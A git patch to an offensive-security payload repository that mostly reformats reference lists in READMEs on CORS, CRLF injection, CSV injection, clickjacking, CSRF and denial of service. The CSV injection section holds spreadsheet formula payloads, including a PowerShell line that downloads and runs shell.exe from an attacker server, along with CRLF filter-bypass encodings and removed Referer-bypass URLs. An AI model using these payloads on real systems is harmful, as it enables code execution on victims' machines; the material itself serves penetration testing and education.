From e138308d3d08392dfc20cbb9637993581132554b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 4 Nov 2024 18:00:07 +0100 Subject: [PATCH] References updated for CORS CRLF CSV --- CORS Misconfiguration/README.md | 12 +-- CRLF Injection/{ => Files}/crlfinjection.txt | 0 CRLF Injection/README.md | 35 +++++---- CSV Injection/README.md | 62 ++++++++++------ Clickjacking/README.md | 23 +++--- Cross-Site Request Forgery/README.md | 78 +++++--------------- Denial of Service/README.md | 39 +++++++--- 7 files changed, 125 insertions(+), 124 deletions(-) rename CRLF Injection/{ => Files}/crlfinjection.txt (100%) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index e9209cb2..2cf45566 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -264,9 +264,9 @@ function reqListener() { ## References -* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) -* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) -* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) -* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) -* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) +- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) +- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) +- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) \ No newline at end of file diff --git a/CRLF Injection/crlfinjection.txt b/CRLF Injection/Files/crlfinjection.txt similarity index 100% rename from CRLF Injection/crlfinjection.txt rename to CRLF Injection/Files/crlfinjection.txt diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 7419a65b..b5a1d049 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -4,16 +4,18 @@ > A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. + ## Summary -- [CRLF - Add a cookie](#crlf---add-a-cookie) -- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) -- [CRLF - Write HTML](#crlf---write-html) -- [CRLF - Filter Bypass](#crlf---filter-bypass) +- [Add a cookie](#add-a-cookie) +- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass) +- [Write HTML](#write-html) +- [Filter Bypass](#filter-bypass) - [Labs](#labs) - [References](#references) -## CRLF - Add a cookie + +## Add a cookie Requested page @@ -36,7 +38,8 @@ x-content-type-options: nosniff x-xss-protection: 1; mode=block ``` -## CRLF - Add a cookie - XSS Bypass + +## Add a cookie - XSS Bypass Requested page @@ -67,7 +70,8 @@ X-XSS-Protection:0 0 ``` -## CRLF - Write HTML + +## Write HTML Requested page @@ -89,7 +93,8 @@ Content-Length: 34 You have been Phished ``` -## CRLF - Filter Bypass + +## Filter Bypass Using UTF-8 encoding @@ -99,18 +104,18 @@ Using UTF-8 encoding Remainder: -* %E5%98%8A = %0A = \u560a -* %E5%98%8D = %0D = \u560d -* %E5%98%BE = %3E = \u563e (>) -* %E5%98%BC = %3C = \u563c (<) +* `%E5%98%8A` = `%0A` = \u560a +* `%E5%98%8D` = `%0D` = \u560d +* `%E5%98%BE` = `%3E` = \u563e (>) +* `%E5%98%BC` = `%3C` = \u563c (<) ## Labs -* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) +* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) ## References -* https://www.owasp.org/index.php/CRLF_Injection -* https://vulners.com/hackerone/H1:192749 +- [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection) +- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - 2016-12-20](https://vulners.com/hackerone/H1:192749) \ No newline at end of file diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 75621d84..91dc4948 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -4,44 +4,58 @@ Many web applications allow the user to download content such as templates for i ## Exploit -Basic exploit with Dynamic Data Exchange +Basic exploits with **Dynamic Data Exchange**. + + +Payload: pop a calc ```powershell -# pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 =2+5+cmd|' /C calc'!A0 +``` -# pop a notepad +Payload: pop a notepad + +```powershell =cmd|' /C notepad'!'A1' +``` -# powershell download and execute +Payload: powershell download and execute + +```powershell =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 +``` -# msf smb delivery with rundll32 -=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 +Payload: Prefix obfuscation and command chaining -# Prefix obfuscation and command chaining +```powershell =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A +thespanishinquisition(cmd|'/c calc.exe'!A = cmd|'/c calc.exe'!A - -# Using rundll32 instead of cmd -=rundll32|'URL.dll,OpenURL calc.exe'!A -=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A - -# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. -= C m D | '/ c c al c . e x e ' ! A - ``` -Technical Details of the above payload: +Payload: Using rundll32 instead of cmd + +```powershell +=rundll32|'URL.dll,OpenURL calc.exe'!A +=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A +``` + +Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. + +```powershell += C m D | '/ c c al c . e x e ' ! A +``` + +Technical details of the above payloads: - `cmd` is the name the server can respond to whenever a client is trying to access the server - `/C` calc is the file name which in our case is the calc(i.e the calc.exe) - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data + Any formula can be started with ```powershell @@ -51,13 +65,13 @@ Any formula can be started with @ ``` + ## References -* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection) -* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) -* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) -* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) -* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) -* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) -* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) - +- [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://owasp.org/www-community/attacks/CSV_Injection) +- [CSV Excel formula injection - Google Bug Hunter University - May 22, 2022](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) +- [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - 30/11/2017](https://payatu.com/csv-injection-basic-to-exploit/) +- [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://blog.xpnsec.com/from-csv-to-meterpreter/) +- [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](http://georgemauer.net/2017/10/07/csv-injection.html) +- [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) +- [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) \ No newline at end of file diff --git a/Clickjacking/README.md b/Clickjacking/README.md index 2f955e49..c49e7cae 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -83,17 +83,18 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in ``` * Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage. - ```html - -
- - ``` + +```html + + + +``` ### Execution Methods diff --git a/Cross-Site Request Forgery/README.md b/Cross-Site Request Forgery/README.md index 493b9f88..d8006367 100644 --- a/Cross-Site Request Forgery/README.md +++ b/Cross-Site Request Forgery/README.md @@ -16,11 +16,6 @@ * [JSON GET - Simple Request](#json-get---simple-request) * [JSON POST - Simple Request](#json-post---simple-request) * [JSON POST - Complex Request](#json-post---complex-request) -* [Bypass referer header validation check](#bypass-referer-header-validation) - * [Basic payload](#basic-payload) - * [With question mark payload](#with-question-mark-payload) - * [With semicolon payload](#with-semicolon-payload) - * [With subdomain payload](#with-subdomain-payload) * [Labs](#labs) * [References](#references) @@ -151,65 +146,32 @@ xhr.send('{"role":admin}'); ``` -## Bypass referer header validation - -### Basic payload -``` -1) Open https://attacker.com/csrf.html -2) Referer header is .. - -Referer: https://attacker.com/csrf.html -``` -### With question mark(`?`) payload -``` -1) Open https://attacker.com/csrf.html?trusted.domain.com -2) Referer header is .. - -Referer: https://attacker.com/csrf.html?trusted.domain.com -``` - -### With semicolon(`;`) payload -``` -1) Open https://attacker.com/csrf.html;trusted.domain.com -2) Referer header is .. - -Referer: https://attacker.com/csrf.html;trusted.domain.com -``` - -### With subdomain payload -``` -1) Open https://trusted.domain.com.attacker.com/csrf.html -2) Referer headers is .. - -Referer: https://trusted.domain.com.attacker.com/csrf.html -``` - ## Labs -* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses) -* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method) -* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present) -* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session) -* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie) -* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie) -* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present) -* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken) +* [PortSwigger - CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses) +* [PortSwigger - CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method) +* [PortSwigger - CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present) +* [PortSwigger - CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session) +* [PortSwigger - CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie) +* [PortSwigger - CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie) +* [PortSwigger - CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present) +* [PortSwigger - CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken) ## References - [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/) -- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) -- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/) -- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) -- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/) -- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820) -- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) -- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) -- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346) -- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) -- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) -- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0) +- [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) +- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://whitton.io/articles/messenger-site-wide-csrf/) +- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) +- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/) +- [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://hackerone.com/reports/100820) +- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) +- [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) +- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://hackerone.com/reports/245346) +- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) +- [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) +- [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://www.youtube.com/watch?v=eWEgUcHPle0) - [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f) -- [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/) +- [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/) \ No newline at end of file diff --git a/Denial of Service/README.md b/Denial of Service/README.md index a3225050..f063c308 100644 --- a/Denial of Service/README.md +++ b/Denial of Service/README.md @@ -5,12 +5,16 @@ ## Summary -* [DoS - Locking Customer Accounts](#dos---locking-customer-accounts) -* [DoS - File Limits on FileSystem](#dos---file-limits-on-filesystem) -* [DoS - Memory Exhaustion - Technology Related](#dos---memory-exhaustion---technology-related) +* [Examples](#examples) + * [Locking Customer Accounts](#locking-customer-accounts) + * [File Limits on FileSystem](#file-limits-on-filesystem) + * [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related) +* [References](#references) -## DoS - Locking Customer Accounts +## Examples + +### Locking Customer Accounts Example of Denial of Service that can occur when testing customer accounts. Be very careful as this is most likely **out-of-scope** and can have a high impact on the business. @@ -21,7 +25,7 @@ Be very careful as this is most likely **out-of-scope** and can have a high impa ``` -## DoS - File Limits on FileSystem +### File Limits on FileSystem When a process is writing a file on the server, try to reach the maximum number of files allowed by the filesystem format. The system should output a message: `No space left on device` when the limit is reached. @@ -41,9 +45,9 @@ FAT32 has a significant limitation of **4 GB**, which is why it's often replaced Modern filesystems like BTRFS, ZFS, and XFS support exabyte-scale files, well beyond current storage capacities, making them future-proof for large datasets. -## DoS - Memory Exhaustion - Technology Related +### Memory Exhaustion - Technology Related -Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory +Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory. * **XML External Entity**: Billion laughs attack/XML bomb ```xml @@ -63,7 +67,22 @@ Depending on the technology used by the website, an attacker may have the abilit ]>